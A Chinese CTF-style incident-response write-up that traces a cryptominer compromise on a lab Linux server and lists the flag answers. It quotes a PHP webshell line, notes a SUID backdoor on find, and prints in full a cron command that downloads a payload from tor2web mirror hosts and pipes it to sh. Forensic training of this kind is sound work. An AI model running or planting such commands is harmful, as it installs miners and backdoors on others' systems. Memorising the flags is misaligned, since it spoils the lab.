玄机——第五章 linux实战-挖矿.md
Last Update:
应急响应工程师在内网服务器发现有台主机 cpu 占用过高,猜测可能是中了挖矿病毒,请溯源分析,提交对应的报告给应急小组
虚拟机账号密码 root websecyjxy web 端口为 8081
1、黑客的IP是? flag格式:flag{黑客的ip地址},如:flag{127.0.0.1}
flag{192.168.10.135}2、黑客攻陷网站的具体时间是? flag格式:flag{年-月-日 时:分:秒},如:flag{2023-12-24 22:23:24}
flag{2023-12-22 19:08:34}3、黑客上传webshell的名称及密码是? flag格式:flag{黑客上传的webshell名称-webshell密码},如:flag{webshell.php-pass}
flag{404.php-cmd}4、黑客提权后设置的后门文件名称是? flag格式:flag{后门文件绝对路径加上名称},如:flag{/etc/passwd}
flag{/usr/bin/find}5、对黑客上传的挖矿病毒进行分析,获取隐藏的Flag
flag{websec_True@888!}过程:
寻找网站日志
发现 192.168.10.135 这个ip在扫描目录
然后再后面发现这个ip在访问 /dede 这个目录,由题目可以知道web端口是8081,我们进行访问
发现是一个后台的登录框
进行弱口令登录,发现是用户名:admin 密码:12345678
登录之后,在会员列表-注册会员列表里发现了一个 hacker 用户,登录ip也和扫描目录的ip一致,登录时间就是黑客攻陷网站的具体时间
回到finalshell 打包网站源码,用D盾扫描发现一个木马——404.php
我们运行这个404.php即可看到具体的代码 “eval($_POST[‘cmd’]);”
然后再查看历史命令记录的时候,发现对find命令提高了权限–4775
发现 find 具有suid权限,可能被用作提取
挖矿病毒一般是在定时任务里,我们查看定时任务
根据代码得出——>>(总的来说就是下载一个文件:’ldm’ )
(curl -fsSLk –connect-timeout 26 –max-time 75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm || curl -fsSLk –connect-timeout 26 –max-time 75 https://an7kmd2wp4xo7hpr.d2web.org/src/ldm || curl -fsSLk –connect-timeout 26 –max-time 75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm || wget –quiet –tries=1 –no-check-certificate –connect-timeout=26 –timeout=75 https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm || wget –quiet –tries=1 –no-check-certificate –connect-timeout=26 –timeout=75 https://an7kmd2wp4xo7hpr.d2web.org/src/ldm || wget –quiet –tries=1 –no-check-certificate –connect-timeout=26 –timeout=75 https://an7kmd2wp4xo7hpr.onion.sh/src/ldm)) | sh &
- curl:这是用于在命令行下进行 URL 传输的工具。
- -fsSLk:这些是 curl 命令的选项:
- -f:如果请求失败,不显示错误信息。
- -s:静默模式,不显示进度或错误信息。
- -S:即使在静默模式下仍显示错误信息。
- -L:如果服务器返回重定向,自动跟随重定向。
- -k:忽略 SSL 证书验证。
- –connect-timeout 26:设置连接超时时间为 26 秒,即在 26 秒内建立连接,否则超时。
- –max-time 75:设置最大传输时间为 75 秒,即在 75 秒内完成整个传输过程,否则超时。
- https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm:这是要下载的文件的 URL,指向 tor2web.su 域名下的 src/ldm 文件。
使用find命令查找一下ldm文件,发现在/etc/.cache/ldm
打开ldm文件,发现在第691行的代码有点奇怪,进行base64解密,发现flag
reward
